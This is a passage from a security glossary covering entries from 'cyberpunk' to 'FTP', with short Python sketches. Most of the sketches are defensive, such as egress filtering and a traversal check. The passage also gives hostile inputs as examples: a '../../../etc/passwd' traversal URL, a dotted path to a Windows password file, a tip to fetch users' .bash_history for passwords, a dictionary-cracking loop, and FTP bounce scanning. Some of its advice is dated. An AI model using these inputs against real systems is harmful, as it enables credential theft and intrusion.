Part of the hacker culture, cyberpunk refers to a subgenre of science fiction dealing with cybernetics. To some, it refers specifically to a small literary movement of the 1980s that is now over. To others, it is generally any sci-fi story with strong cybernetic elements.

Key points: The two defining books of cyberpunk are Neuromancer by William Gibson and Snow Crash by Neal Stephenson. Neuromancer is considered "hard core" cyberpunk that launched the genre.

- D -

daemon [2]

On UNIX, a daemon is a program running in the background, usually providing some sort of service. Typical daemons are those that provide e-mail, printing, telnet, FTP, and web access.

datagram [4]

In protocols, a datagram is a single transmission that stands by itself. Datagrams are often known as unreliable datagrams because there is no guarantee that they will reach their destination. It is up to some higher protocol or application to verify that a datagram reaches its destination. Streaming media (audio/video/voice) often use datagrams because it doesn't really matter if a few are lost in transmission.

DDoS (Distributed Denial of Service)[2]

A DDoS attack is one that pits many machines against a single victim. An example is the attacks of February 2000 against some of the biggest websites. Even though these websites have a theoretical bandwidth of a gigabit/second, many agents distributed throughout the Internet can bring them down by flooding them with traffic.

Key point: The Internet is defenseless against these attacks. The best defense is for ISPs to do "egress filtering": prevent packets from going outbound that do not originate from IP addresses assigned to the ISP. This cuts down on the problem of spoofed IP addresses.
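
Example: A minimal Python sketch of the egress-filtering decision. The prefixes below are documentation address ranges standing in for the blocks assigned to a hypothetical ISP, and the function name allow_outbound is invented for illustration; a real router does this in its forwarding path, not in a script.

```python
import ipaddress

# Hypothetical address blocks assigned to the ISP's customers.
ASSIGNED_PREFIXES = [
    ipaddress.ip_network("192.0.2.0/24"),
    ipaddress.ip_network("198.51.100.0/24"),
]

def allow_outbound(source_ip: str) -> bool:
    """Let a packet leave only if its source address belongs to the ISP."""
    addr = ipaddress.ip_address(source_ip)
    return any(addr in net for net in ASSIGNED_PREFIXES)

print(allow_outbound("192.0.2.133"))   # source inside an assigned block
print(allow_outbound("10.1.2.3"))      # spoofed source, not assigned to this ISP
```

A flooding agent behind such a filter can still send traffic, but only with its real address, which makes it far easier to trace and block.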

deface [2]

The average web server is vulnerable to being exploited, either compromised directly giving full control to the hacker, or at least to the point where the hacker can replace web pages. Therefore, sites are being hacked every day.

Key point: There are sites, like http://www.attrition.org that catalogue defaced sites and mirror the defaced web-pages.

Key point: Defaced web-pages are an important part of hacker attitude.

Key point: Elite hackers rarely deface web-pages; they instead break in and control the server for other nefarious purposes that yield more profit.

Key point: Web servers are easy to deface because the average OS and web server contain vulnerabilities (defaults and samples) upon installation. It takes extensive effort to harden a server.

defaults [3]

The "defaults" are the settings of a system before it has been configured.

Key point: Security irritates customers who prefer products that are easy to use. Therefore, most vendors make the same trade off. They ship their systems with the best "out-of-box" experience, and as a result most boxes are easily hacked in their default state. The more a vendor touts its ease-of-use, the more likely hackers will find that vendor's products easy to hack.

See also: samples

DES (Data Encryption Standard) [3]

In cryptography, DES (Data Encryption Standard) is the most popular algorithm for encrypting data. It is standardized by the United States government (FIPS 46, also adopted as ANSI X3.92) as well as the ISO.

Key point: DES ushered in a new era of cryptography. Before DES, strong encryption was only available to large governments and militaries. Cryptography research was similarly limited. Anything that the average person might use could easily be cracked by a major government. DES created a well-defined, easily verifiable security architecture that was available to anyone. DES-capable products flooded the market. Beyond making encryption products available to anyone, DES essentially created the cryptographic community. Before DES, researchers toiled away under government/big-business secrecy. After DES, cryptography became a normal computer-science subject. Whereas DES itself was developed by secretive government agencies (NSA) and mammoth corporations (IBM), DES's replacement will likely be created by relatively independent researchers and the cryptographic community as a whole.

dictionary [3]

In hacking circles, a dictionary is simply a list of words that plug into cracking programs in order to break passwords. Such dictionaries not only contain real words, but words that people might choose for passwords (example: NCC1701, which is the serial number for the starship Enterprise in Star Trek).

Key point: It takes only a couple of minutes to run through hundreds of thousands of words in a dictionary in order to crack a password. Therefore, never choose a word that might be in a dictionary.
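
Example: A minimal Python sketch of what a cracking program does with a dictionary. It assumes, purely for illustration, that the password is stored as an unsalted SHA-256 hash; real systems use other (often salted) schemes, and the function name crack and the tiny word list are made up.

```python
import hashlib

def crack(target_hash: str, wordlist):
    """Hash each candidate word and compare it with the stolen hash."""
    for word in wordlist:
        if hashlib.sha256(word.encode()).hexdigest() == target_hash:
            return word
    return None   # password was not in the dictionary

# Hypothetical stolen hash and dictionary.
stolen = hashlib.sha256(b"NCC1701").hexdigest()
dictionary = ["password", "enterprise", "NCC1701", "letmein"]
print(crack(stolen, dictionary))
```

The loop does one cheap hash per word, which is why even a dictionary of hundreds of thousands of entries is exhausted quickly.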

directory climbing (directory traversal) [3]

A common bug that is the source of many compromises. This bug comes about because a program does not parse the filename given to the program but simply passes it off to the system. Therefore, by prefixing file names with "../../..", the hacker can force the program to read any file on the system.

Example: Many programs contain built-in HTTP servers. This allows the program to be remotely managed from any web browser. These servers expect that only the files in their own directory and below will be read. However, hackers can still provide URLs that go up directories, and down into other directories in order to read any file from the system. For example, a hacker might be able to read the UNIX password file by typing in the URL: http://www.robertgraham.com/../../../etc/passwd.

Key point: This bug occurs because programmers frequently forget to double-check input.

Example: This bug is common. The original version of Win95 had this bug, so that if you had access to File and Print Sharing to any subdirectory, you also had access to the entire system. A huge number of HTTP servers and CGI scripts have this bug. Many FTP servers have had this bug.

Key point: Win9x has the quirk that three dots "..." means "two directories up", four dots "...." means "three directories up", and so on. Additionally, whereas on many UNIX systems going up past the top directory automatically generates an error, going above the top directory on Windows leaves you in the top directory. Therefore, filenames like "............/Windows/greg.pwl" are frequently seen: the hacker puts more than enough dots in the path in order to guarantee they reach the root directory.

Key point: Many popular Windows "personal web servers", including several versions shipped from Microsoft, have had either the "../.." or "....." vulnerability. In particular, since the "....." issue is not widely known, it is very common among those products that fix the first variant. FrontPage98 from Microsoft shipped with this bug.
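
Example: A minimal Python sketch of the check that vulnerable programs leave out. The document root /var/www and the function name resolve_under_root are hypothetical. It normalizes the requested name and refuses anything that ends up outside the root. Note the assumptions: it only understands UNIX-style ".." components, so it does not cover the Win9x "..." quirk, symbolic links, or encoded variants of the dots.

```python
import posixpath

def resolve_under_root(root: str, requested: str):
    """Return the normalized path if it stays inside root, else None."""
    # Join the request onto the root, then collapse any "." and ".." parts.
    candidate = posixpath.normpath(posixpath.join(root, requested.lstrip("/")))
    inside = candidate == root or candidate.startswith(root.rstrip("/") + "/")
    return candidate if inside else None

ROOT = "/var/www"   # hypothetical directory the server is meant to expose
print(resolve_under_root(ROOT, "docs/index.html"))
print(resolve_under_root(ROOT, "../../../etc/passwd"))
```

The important design choice is to normalize first and compare afterwards; searching the raw string for "../" misses too many variants.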

DMZ (Demilitarized Zone)[3]

In firewalls, a DMZ is an area that is mostly public to the Internet. This is where a company's web, e-mail, and DNS servers are located. A DMZ often has some limited protection, but since it is very exposed to the Internet, the assumption is that the machines in the zone will eventually be compromised. Therefore, the machines often have as little connectivity to the private network as any other machine from the Internet.

DNS (Domain Name System)[3]

Analogy: When calling somebody via the telephone, you can look up their name in the phone book in order to find the telephone number. DNS is a similar directory service. When contacting a web site, your browser looks up the name in DNS in order to find the IP number.

History: DNS is relatively new. When the Internet was small, every machine simply had a list of all other machines on the Internet (stored in /etc/hosts). Generally, people just had the IP addresses of machines memorized in much the same way that people memorize phone numbers today.

Key point: DNS is not needed for communication. If a DNS server goes down, newbies will think that the entire network is down. Hackers frequently deal with raw IP addresses, and indeed often bypass DNS entirely as it may give off signs of an attack.

Key point: The DNS hierarchy starts from the "top level domains" of .com, .net, .org, .edu, .gov, .mil, and the two-letter country codes (e.g. .us for United States, .jp for Japan).

Misunderstanding: Both IP addresses and domain names use dots: "www.robertgraham.com" vs. "192.0.2.133". This has no significance; the usage of these dots is basically unrelated. Trying to match things up one-to-one is wrong (i.e. ".com" == "192.").

Analogy: What is your phone number? If I asked you this, you might give me both your home number and your cell phone number. I can reach you at either one. In much the same way, a domain name like www.yahoo.com can have multiple IP addresses. Every time you visit that site, you might go to a separate IP address. You can test this out yourself. Go to the command-line and type "ping www.yahoo.com". Notice how it comes back with an IP address that it pings. After that runs, try it again. Notice how the second time it may be pinging a different IP address.

Details: DNS provides a number of resource records (RR):

A: The normal record that contains a name to IP address mapping.
LOC: The geographic location, containing latitude, longitude, altitude, and size. Altitude is in meters above sea level. Size is the exponent, in meters, of the volumetric size of the object. Hackers sometimes use these records to find where you are located physically. Humor: The original name of this record was ICBM.
HINFO: HINFO (host information) records can contain information about the machine, such as if it is a Windows or UNIX machine. Administrators probably should not fill them in; they are dangerous.

DoS (Denial of Service) [3]

An exploit whose purpose is to deny somebody the use of the service: namely to crash or hang a program or the entire system.

Example: Some classes of DoS are:

flooding the victim with more traffic than he can handle
flooding a service (like IRC) with more events than it can handle
bomb
crashing a TCP/IP stack by sending corrupt packets
crashing a service by interacting with it in an unexpected way
hanging a system by causing it to go into an infinite loop

Example: The Ping of Death exploit crashed most machines vintage 1995 by sending illegally fragmented packets at a victim.

Culture: A common word for DoS is "nuke", which was first popularized by the WinNuke program (a simple ping-of-death exploit script). These days, "nukes" are those DoS exploits that script kiddies in chat rooms use against each other.

dropper [2]

In viruses and trojans, the dropper is the part of the program that installs the hostile code onto the system.

dumpster diving [2]

AKA trashing

Key point: Dumpster diving is generally legal, as long as you are not trespassing.

- E -

eggdrop(eggies) [2]

In the IRC wars, robot programs are used to keep people logged in on channels, and to remotely control channels. These programs are known by the most popular variant called "eggdrop".

elite [2]

The mythical creature that inhabits the top ranks of the hacker underground.

Culture: Really became popular after the 1995 movie Hackers.

Culture: This word finds itself mangled in many variations: eleet, leet, 1337, 31337, etc.

Statistics: Ira Winkler, former analyst at the NSA and now writer, estimates that as of 1999 there are roughly 500 to 1000 "elite" hackers capable of finding new security holes, and roughly 5000 hackers capable of creating exploit scripts. (He further estimates about 100,000 script kiddies.)

encryption [3]

In cryptography, encryption applies mathematical operations to data in order to render it incomprehensible. The only way to read the data is to apply the reverse mathematical operations. In technical speak, encryption applies a mathematical algorithm with a key to convert plaintext to ciphertext. Only someone in possession of the key can decrypt the message.

Analogy: Some aliens come down to earth and give you a safe, and a key to the lock. For purposes of this discussion, the aliens use some magic technology that is beyond our human understanding, and that we will never be able to break into the safe. You steal something, put it into the safe, and lock it up with the key. You hide the key. The police arrest you and confiscate the safe. The only way the police will ever recover this stolen object is when you give them the key. Encryption is the same way; it creates an unbreakable box that you can put data in that nobody can ever get back out unless they have the appropriate key.

Controversy: Encryption has massive philosophical implications when put into widespread use. It means that citizens can hide their data from governments (especially repressive ones) and law enforcement (especially when you are committing a crime). This has the potential of making governments more accountable to the populace. It likewise has the potential of making crime easier.

Key point: Encryption tends to be the strongest link in the chain. When encryption is cracked, it is usually through some other weakness like key distribution or weak passwords.

Contrast: Asymmetric encryption uses different keys for encryption and decryption. Since the most useful form of this is one where you keep one key private and make the other public, this is better known as public key encryption. In contrast, symmetric encryption uses the same key for both encryption and decryption.
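
Example: A toy Python sketch of the contrast. Neither half is secure: the symmetric half is a repeating-key XOR and the asymmetric half is textbook RSA with tiny primes, both picked only because they fit in a few lines (this entry does not name either one, so treat the choice as an assumption). The names xor_cipher, shared_key and the numbers are illustrative. The modular inverse via pow(e, -1, phi) needs Python 3.8 or later.

```python
def xor_cipher(data: bytes, key: bytes) -> bytes:
    """Symmetric toy: the same key both encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

shared_key = b"k3y"
secret = xor_cipher(b"attack at dawn", shared_key)
print(xor_cipher(secret, shared_key))        # same key recovers the plaintext

# Asymmetric toy: textbook RSA with tiny primes (far too small for real use).
p, q = 61, 53
n = p * q                                    # public modulus
phi = (p - 1) * (q - 1)
e = 17                                       # public exponent: anyone may encrypt
d = pow(e, -1, phi)                          # private exponent: only the owner decrypts

message = 65
ciphertext = pow(message, e, n)              # encrypt with the public key (e, n)
recovered = pow(ciphertext, d, n)            # decrypt with the private key (d, n)
print(ciphertext, recovered)
```

In the first half both sides must already share shared_key; in the second, the sender needs only the public pair (e, n), which is the property that makes encrypted connections to strangers possible.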

Notes: Some algorithms popular in cryptography are: DES, RC4. Some popular applications that use encryption are: PGP, web browsers. Some protocols that use encryption are: SSL, IPsec.

escrow [3]

In general, escrow means to hold something aside in case of eventualities.

Analogy: For example, one company provides software that another company sells embedded in their hardware. The second company (the OEM) is scared that the first company might go out of business, so requests that the first company put the source code for the software in escrow. Should the first company go out of business, the second company would still be able to sell their product.

Key point: Law enforcement is constantly pushing for key escrow where a third party holds back-door keys to all encryption products. Law enforcement would then be able to obtain these keys with a court order in order to decrypt messages or eavesdrop on communications. They propose a variant of the two-person rule in order to prevent abuse of the system. Note that the general problem is called key recovery (in which law enforcement can recover the key using some means); key escrow is just one way of doing key recovery.

Ethernet [3]

Ethernet is the "classic" technology to interconnect machines in a local area.

Key point: Every Ethernet adapter has a unique 6-byte MAC address. The first 3 bytes identify the manufacturer; the second 3 bytes are assigned by the manufacturer. If two adapters have the same MAC address, then communications errors will occur (just as if you named both your kids "George", they'd be confused as to which one you are talking to). Making the adapter addresses globally unique assures that they will be locally unique when plugged into the same LAN. However, this has security/privacy implications. A chain of events led to MAC addresses becoming embedded in Microsoft Word documents, which helped track down the author of the Melissa virus. Similarly, Network ICE's products scan the intruder with a number of protocols that may reveal the MAC address of an intruder.

Key point: Ethernet was originally designed as a "shared medium", which means that every adapter on the wire sees all traffic. In normal operation, an Ethernet adapter discards all traffic that doesn't contain its MAC address. However, that filter can be turned off, putting the adapter in promiscuous mode. This converts the machine into a sniffer which can eavesdrop on everyone's traffic.

Format:

The basic format of an Ethernet frame is:


+--------+--------+--------+--------+--------+--------+
|  Destination MAC Address                            |
+--------+--------+--------+--------+--------+--------+
|  Source MAC Address                                 |
+--------+--------+--------+--------+--------+--------+
|  EtherType      |
+--------+--------+
...
payload
(46 bytes to 1500 bytes)
...
+--------+--------+--------+--------+
| CRC                               |
+--------+--------+--------+--------+

These days, the most common payload is IP which is identified with an EtherType of 0x0800. Note that as soon as the payload leaves the local Ethernet (through a router), the local Ethernet headers are stripped off. Only the payload itself will traverse the Internet; local Ethernet information (like your MAC address) does not. (Hackers might still be able to retrieve your MAC address through NetBIOS or SNMP, though).

Note that the CRC protects against accidental corruption of the frame, but not intentional corruption.
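
Example: A minimal Python sketch that pulls the three header fields out of a raw frame, following the layout above. The function names and the sample frame are made up for illustration (the source MAC is from a range reserved for documentation), and the sketch assumes the frame has already had its trailing CRC removed, as is typical by the time software sees it.

```python
import struct

def format_mac(raw: bytes) -> str:
    """Render 6 raw bytes in the usual colon-separated hex form."""
    return ":".join(f"{b:02x}" for b in raw)

def parse_ethernet_header(frame: bytes):
    """Split a frame into (destination MAC, source MAC, EtherType, payload)."""
    if len(frame) < 14:
        raise ValueError("frame too short for an Ethernet header")
    # 6-byte destination, 6-byte source, 2-byte EtherType in network byte order.
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    return format_mac(dst), format_mac(src), ethertype, frame[14:]

# Hypothetical frame: broadcast destination, documentation source MAC, IP payload.
sample = bytes.fromhex("ffffffffffff" "00005e005301" "0800") + b"payload"
dst, src, ethertype, payload = parse_ethernet_header(sample)
print(dst, src, hex(ethertype), payload)
```

A sniffer in promiscuous mode does essentially this for every frame on the wire, then hands frames with EtherType 0x0800 to its IP decoder.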

executable [1]

Anything that can "run" on a computer.

Example: ActiveX, Java, JavaScript, .exe files, programs.

exploit [2]

A way of breaking into a system. An exploit takes advantage of a weakness in a system in order to hack it.

Culture: Exploits, or "exploitz", are the root of the hacker culture. Hackers gain fame by discovering an exploit. Others gain fame by writing scripts for it. Legions of script-kiddies apply the exploit to millions of systems, whether it makes sense or not.

Controversy: There is no good definition for this word. It is debated a lot trying to define exactly what is, and is not, an exploit.

Key point: Since people make the same mistakes over-and-over, exploits for very different systems start to look very much like each other. Most exploits can be classified under major categories: buffer overflow, directory climbing, defaults, samples, Denial of Service.

- F -

factorization [4]

In public key cryptography, we hunt for mathematical operations that are easy to do in one direction, but difficult to do in the opposite direction. For example, you (with pen+paper) can easily calculate the value of n in:

127 X 131 = n

In contrast, try to find the values of m and n in the following equation using a pen and paper.

m X n = 24289

The second equation above is known as factorization. It is difficult to do not only by hand, but also by computer.

Key point: Note that in the example above, I use a small number (24289) simply to demonstrate that multiplication is easier than factorization. Somebody sent me e-mail proposing that factoring 24289 is not too difficult: you simply brute-force calculate 24289/n for all n between 1 and 24289, and the results that are integers are factors. However, in cryptography, the numbers used are actually much larger, and look something like:

6237804950192837659018341982347561398740112837491903875781783635465346657897987894783717848757929837483241243454656677787898908978775756362515414353646768798980798873897890141298374873838929102938578

Using the combined computing power of all the world's computers, it would take longer than a billion times the age of the universe to use the simple technique to solve this problem. Actually, longer, but I'm trying to use comprehensible numbers. Remember that if I add a digit to the number I'm trying to factor, it will take ten times longer to compute. For example, the number 242891 takes ten times longer to search through than 24289. Likewise, every nine digits you add to a number causes the search to take a billion times longer. There are several mathematical techniques easier than brute-force factorization, but all of them are hard.
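
Example: A minimal Python sketch of the brute-force approach on the small number from above. The function name smallest_factor_pair is made up, and the sketch takes one small shortcut over trying every n between 1 and 24289: it stops at the square root, since any factor pair has one member at or below it.

```python
def smallest_factor_pair(n: int):
    """Return (m, k) with m * k == n and m the smallest factor above 1, or None if n is prime."""
    m = 2
    while m * m <= n:          # one member of any factor pair is <= sqrt(n)
        if n % m == 0:
            return m, n // m
        m += 1
    return None

print(127 * 131)                      # the easy direction: one multiplication
print(smallest_factor_pair(24289))    # the hard direction: a search
```

For 24289 the search finds 107 and 227 after about a hundred trial divisions, which is instant on a computer. Even with the square-root shortcut the work still grows exponentially with the number of digits, so the same loop is hopeless against a number of the size shown above.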

Key point: Currently, it is unknown exactly how difficult factoring numbers is. Today's public-key infrastructure would crumble if someone found an easy way to factor such numbers.

fail-safe (fail-open, fail-close) [3]

A philosophic point of view. When a system fails, how should it leave things: secure or insecure? For example, if a firewall crashes, should it disable all network connectivity, or should it allow network connectivity to continue unprotected? A lot of security vulnerabilities occur because designers make the wrong choice. It is often easier to cause a system to fail than to break through it, so security items should probably fail in such a way as to result in greater security at the expense of stopping everything.

Confusion: The terms "fail-open" and "fail-close" are frequently used to mean the opposite of each other. Some people think of a door, which when "open" allows things to pass through. Other people think of an electrical circuit, when "open" stops the flow of current (and conversely, a "closed" circuit passes current). Therefore, use the word "fail-safe" instead in order to avoid confusion.

Analogy: The electrical circuit-breakers in your home are fail-safe switches using this concept. In the case of an electrical fault causing a short, the circuit breaker will blow open, halting the flow of electricity. This prevents a fire from starting.

File and Print Sharing [1]

In Win95 and Win98, File and Print Sharing is the name of the service that allows home users to share files (and printers) among their home machines. The printer may be hooked up to one machine, then other machines within the household can print to that printer. Similarly, a user may share a directory, which other members of the household can connect to.

Key point: The problem is that TCP/IP knows no boundaries. When a user tells the system to share files with the rest of the family, the user is not quite aware that this means the files are shared with the rest of the Internet. This means that anybody, anywhere on the Internet can at any time connect to the machine and read/write files. To see if somebody has accidentally shared their hard-disk, right-click on "Network Neighborhood" in Windows, select "Find Computer...", then type in that user's IP address.

Key point: File and Print Sharing used the SMB protocol over NetBIOS on TCP port 139.

finger [1]

In UNIX, the finger service provides information about users. Fingering a user, such as running the command "finger rob@robertgraham.com", will often display the contents of the .plan file. Fingering no specific user, such as "finger @robertgraham.com", will list all the users who are logged on. Fingering users is often done during the reconnaissance phase of an attack.

Example: The following shows the output of the command "finger rob@rh5.robertgraham.com":


Login: rob                              Name: Robert David Graham
Directory: /home/rob                    Shell: /bin/bash
On since Fri Dec  3 18:13 (PST) on ttyp0 from gemini
No mail.
No Plan

Key point: The finger command reveals extensive information. For example, if I were attacking the above machine, I would notice that the user is running bash. Therefore, I might try something like http://rh5.robertgraham.com/~rob/.bash_history against the user, which in about 1% of the cases will give me a history file of recent commands they've entered, which might contain passwords and such.

fingerprint [3]

A common scan hackers perform nowadays is fingerprinting a system in order to figure out what operating system it is running. The two main types of fingerprinting are Queso, which sends weird TCP flags, and nmap, which sends weird TCP options. Narrowing down the operating system is important. For example, attempting Windows-specific hacks against a UNIX system is pointless. Fingerprinting is possible because the TCP/IP specifications do not fully define the behavior of a protocol stack. Therefore, by sending unusual (undefined) network traffic at a system, the hacker will receive responses unique to that system.

Key point: One of the key reasons for fingerprinting a system is to search for "old" or "unusual" systems. Non-computer devices like routers, printers, modem banks, etc. are not written to the same level of security standards as real computers. In addition, a hacker might be able to find old SunOS 4 systems which are rife with well-known security flaws.

firewall [1]

A device that isolates a network from the Internet. The word is derived from construction, where "firewalls" isolate areas of a building in order to stop a fire from spreading.

A firewall acts as a "choke point". Corporations install firewalls between their internal (private) networks and the (public) Internet. All traffic between the corporation and the Internet flows through the firewall. It acts as a "gate" with virtual guards that examine the traffic and decide whether to allow it or block it.

Misunderstanding: Many people believe that a firewall makes your network immune to hacker penetration. Firewalls have no ability to decide for themselves whether traffic is hostile or benign. Instead, the administrator must program the firewall with rules as to what type of traffic to allow or deny. This is similar to a guard checking badges at a gate: the guard can only detect if the badge is allowed/denied, but cannot detect impersonations or somebody climbing the fence in the back.

Key point: Firewalls are based on the principle of blocking everything by default and only allowing those things that are absolutely necessary.
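
Example: A minimal Python sketch of the default-deny principle as a packet filter might apply it. The Rule type, the rule list, and the function name decide are all hypothetical; real filters match on many more fields (addresses, direction, connection state).

```python
from typing import NamedTuple, Optional

class Rule(NamedTuple):
    action: str               # "allow" or "deny"
    protocol: str             # "tcp" or "udp"
    dst_port: Optional[int]   # None matches any port

# Hypothetical policy: only inbound mail and web are considered necessary.
RULES = [
    Rule("allow", "tcp", 25),
    Rule("allow", "tcp", 80),
]

def decide(protocol: str, dst_port: int, rules=RULES) -> str:
    """First matching rule wins; anything unmatched is blocked."""
    for rule in rules:
        if rule.protocol == protocol and rule.dst_port in (None, dst_port):
            return rule.action
    return "deny"             # the default: block everything not explicitly allowed

print(decide("tcp", 80))      # explicitly allowed
print(decide("tcp", 139))     # never mentioned, so blocked
```

Note what the filter does not do: it never inspects whether the traffic to port 25 or 80 is hostile. Every "allow" rule is a hole the administrator has chosen to accept.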

Key point: Firewall administrators are frequently at odds with their management. Executives are frequently frustrated by things that don't work in the network. They don't understand how difficult it is to secure each new application, or the increased risks involved.

Controversy: A lot of time is wasted on trying to come up with the exact definition of the word "firewall", usually by marketing flaks or nerds with attitude. The term isn't well defined. Most people equate firewalls with packet filters. Others include proxy servers and NATs along with the definition.

Misunderstanding: A common question posed is "what is the best firewall?". People who ask the question mean "what stops hackers the best?". This is based upon the same misunderstanding highlighted above: firewalls isolate you from the Internet in the hopes of reducing exposure to hackers. The firewall that will protect you best from hackers is therefore one that completely isolates you from the Internet (i.e. don't use the Internet at all). If you want to use the Internet, then you will have some risk due to hackers that firewalls cannot prevent. For example, if you tell the firewall to accept incoming e-mail, then you are suddenly at risk from hacks against e-mail (either viruses, or attempts to force spam through your server). Therefore, the most secure firewall tends to be the cheapest, such as the basic packet filters built into most routers and operating systems. The more expensive firewalls allow you to secure more applications through the firewall, but the more features that you use, the more applications you expose, and ultimately the more risk you undertake.

Misunderstanding: Some vendors are selling personal firewalls. This is based upon the misconception highlighted above: firewalls do not block hacker traffic, they are instead a (blunt) tool that allows security administrators to reduce risk. Putting packet filters in the hands of end-users doesn't give them the necessary expertise to secure their systems against hackers. There is also the issue that properly configuring a firewall is actually more difficult than hardening a single machine in the first place. It is only worthwhile because one firewall controls access to hundreds/thousands of machines. Putting a single firewall on a single machine isn't really worth the effort.

flood [3]

A class of hacker attack whereby the victim is flooded with information.

Examples:

The DDoS attacks of early 2000: Major websites were flooded with traffic, clogging their 1-Gbps high-bandwidth Internet connections.
IRC: A user in the chatroom is flooded with commands, or the user's client is triggered into flooding the server with commands. Either way, the user has to log out or is kicked off.
RalF: In the olden days, a UNIX command that looks like ls / -RalF > /dev/tty1 would flood a user's terminal with huge quantities of text, forcing them to log out.

forensics [3]

In anti-hacking, forensics is the science of sifting through clues looking for evidence.

Examples:

firewall: The firewall can often provide clues, as described in my firewall forensics document.
sniffer: Sniffing packets can reveal clues as to the identity of the intruder.
hard drive: Law enforcement will frequently confiscate the hacker's hard drive. They have the ability to not only recover deleted files, but also recover files that have been overwritten.

fragment [4]

The IP protocol has the ability to fragment one large IP packet into smaller packets. The receiver then reassembles them before forwarding the data up to the application, making this invisible. Fragmentation is necessary because IP is designed as an abstraction above local links. Since different links support different maximum packet sizes, some routers on the Internet can receive packets larger than can be transmitted along the next hop in the path. Therefore, IP allows 64-kilobyte packets even though most links cannot handle that size.

Example: Ethernet supports a maximum packet size of 1500 bytes. Therefore, in order to send an IP packet of 2000 bytes, the system must first fragment the packet into two pieces before transmission. The other end will then reassemble them back into a single packet.
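
Example: A minimal Python sketch of the arithmetic behind the 2000-byte case. The function name fragment is made up, and the sketch assumes a plain 20-byte IP header with no options. Fragment offsets are carried in units of 8 bytes, so every fragment except the last must carry a multiple of 8 data bytes.

```python
def fragment(total_len: int, mtu: int = 1500, header_len: int = 20):
    """Split an IP packet of total_len bytes (header included) into fragments.

    Returns (offset, data_len, more_fragments) tuples, with offset and
    data_len counted in bytes of data after the IP header.
    """
    data = total_len - header_len
    max_data = (mtu - header_len) // 8 * 8   # largest multiple of 8 that fits in one link packet
    fragments = []
    offset = 0
    while offset < data:
        data_len = min(max_data, data - offset)
        more = offset + data_len < data      # "more fragments" flag is set on all but the last
        fragments.append((offset, data_len, more))
        offset += data_len
    return fragments

print(fragment(2000))
```

For the 2000-byte packet this gives two fragments: 1480 data bytes at offset 0 with the "more fragments" flag set, then the remaining 500 data bytes at offset 1480. Each one gets its own 20-byte header on the wire.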

Contrast: The general concept of fragmentation applies to all layers of the protocol stack. For example, ATM has a maximum frame size of 48-bytes, which is too small and inefficient for any purpose if higher layers had to deal with it. Therefore, the ATM adapter itself handles the fragmentation and presents a "virtual" interface that allows a full 64-kilobyte packet to be sent without IP level fragmentation. Conversely, when reading files from a file server, even a 64-kilobyte packet size is too small, so the file server layer automatically requests smaller parts of the file. In some cases, applications will attempt to calculate the MTU (Maximum Transmission Unit) of the connection in order to optimize operations to avoid any IP fragmentation.

Key point: IP fragmentation is slow, and is better handled either below the IP layer (like ATM) or above it (like in the application layer).

Key point: Fragmentation and reassembly are difficult to program correctly. Therefore, there are numerous ways to hack this feature. Some attacks are:

firewall evasion: By fragmenting packets in the middle of the TCP header, firewalls can no longer filter according to port number. This technique has been used to successfully penetrate firewalls, though most now defend against this.
ping of death: Each fragment has an offset (from the start of the pre-fragmented packet) and a length. While neither the offset nor the length can be greater than 65535, when added together, they can extend past the 65535-byte packet size limit. Prior to 1995, few systems checked for this, allowing fragmented packets to be created that would cause a buffer-overflow. While normally this would require building the packets by hand, Windows would actually send such fragments using the built-in ping command.
teardrop: In normal practice, you cannot create cases where IP fragments overlap. Therefore, hackers have found numerous techniques of creating overlapping IP fragments that cause systems to crash. The first of these attacks was called teardrop and would crash both Windows and Linux systems. Subsequent variations were known as bonk, boink, newtear, newtear2, and syndrop.
floods: Fragmentation code is very slow. Therefore, an easy DoS is to send huge amounts of fragmented traffic at a system. One way is to use the ping command to send large pings as fast as it can; another is to use libnet to hand-craft packets.
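
The ping-of-death and teardrop cases in the list above both come down to missing sanity checks during reassembly. The following Python sketch shows the kind of check a stack might perform before copying fragments into a buffer. The function name check_fragments and the (offset, length) representation are assumptions made for illustration, and header bytes are ignored to keep the arithmetic simple.

```python
MAX_IP_PACKET = 65535  # largest value the 16-bit Total Length field can hold


def check_fragments(fragments):
    """fragments: list of (offset, length) pairs in bytes.

    Returns a list of problems found; an empty list means nothing suspicious.
    """
    problems = []
    previous_end = 0
    for offset, length in sorted(fragments):
        end = offset + length
        if end > MAX_IP_PACKET:
            # offset and length are each legal, but their sum is not
            problems.append(f"fragment at {offset} ends at {end} "
                            f"(ping-of-death style)")
        if offset < previous_end:
            # this fragment starts inside data that was already received
            problems.append(f"fragment at {offset} overlaps data ending at "
                            f"{previous_end} (teardrop style)")
        previous_end = max(previous_end, end)
    return problems


print(check_fragments([(0, 1480), (1480, 500)]))   # well-formed
print(check_fragments([(65528, 1480)]))            # extends past the limit
print(check_fragments([(0, 36), (24, 4)]))         # second fragment overlaps
```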

Key point: Most network-based intrusion detection systems do not reassemble packets. Therefore, a hacker can use something like fragrouter in order to evade the IDS.

Key point: Fragmentation is almost never needed. Most communication runs over TCP, which does its own, more efficient segmentation. Therefore, if you see any fragmentation on your network, you should examine it closely to see if it indicates an attack.

FTP (File Transfer Protocol)[2]

Before HTTP, FTP was the most popular protocol for downloading files across the Internet.

Key point: FTP uses an outgoing control connection that only sends commands to the server and receives returned status information. All data is transferred on separate connections (one connection for each file or directory transferred).

Key point: Before the web (and graphical browsers), people used command-line versions of FTP. These are still preferred by hackers, because GUIs are often too "noisy" (generating unnecessary commands). Such command-line clients are still included in virtually all UNIX and Windows systems.

Key point: These separate connections are created by sending a PORT command across the control connection. This command accepts both an IP address and a port number that tell the other side where to connect. Example: PORT 192,2,0,201,10,1 is the string sent across the control connection to tell the server that the client has opened a port on the machine with the IP address 192.2.0.201 with port 2561 (10*256 + 1). The server will then open up a TCP connection as instructed. This command is sent invisibly when the client requests a directory listing or file; all the client sees of this happening is a status message to the effect 200 PORT command successful. which is sent back across the control connection. A neat hack is to specify somebody else's IP address in this command. This hack is called a bounce attack, and can be used to port scan computers or subvert trust relationships.
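
The encoding of the PORT argument is easy to get wrong by hand, so here is a small Python sketch of the conversion in both directions. The function names are hypothetical; the only rule relied upon is that the last two numbers are the high and low bytes of the port.

```python
def parse_port_argument(argument):
    """Convert 'h1,h2,h3,h4,p1,p2' into (ip_address, port)."""
    fields = [int(part) for part in argument.split(",")]
    if len(fields) != 6 or not all(0 <= value <= 255 for value in fields):
        raise ValueError(f"malformed PORT argument: {argument!r}")
    ip_address = ".".join(str(value) for value in fields[:4])
    port = fields[4] * 256 + fields[5]  # high byte, then low byte
    return ip_address, port


def format_port_command(ip_address, port):
    """Build the PORT command a client would send for this address and port."""
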